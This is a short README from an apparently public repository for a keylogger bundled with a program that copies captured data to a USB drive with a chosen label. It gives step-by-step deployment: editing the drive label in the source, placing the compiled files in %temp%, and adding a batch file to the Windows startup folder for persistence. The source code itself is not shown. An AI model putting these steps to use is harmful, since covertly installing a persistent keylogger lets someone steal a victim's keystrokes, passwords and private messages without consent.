vende11s/keylogg/README.md

 # keylogg-scanning4pendrive
 simple keylogger + program which scan is in PC drive what name is 'something in code' and then copy it to your drive

+U have to set ur pendrive name in checking.cpp in checkDriveLabel() on bottom of the file

+After compile put main.cpp & checking.cpp in %temp%.
+Then press win + r write them shell:startup.
+In window which opened paste autostart1.bat.
+Done.

+Keylogger in 95% made by EgeBalci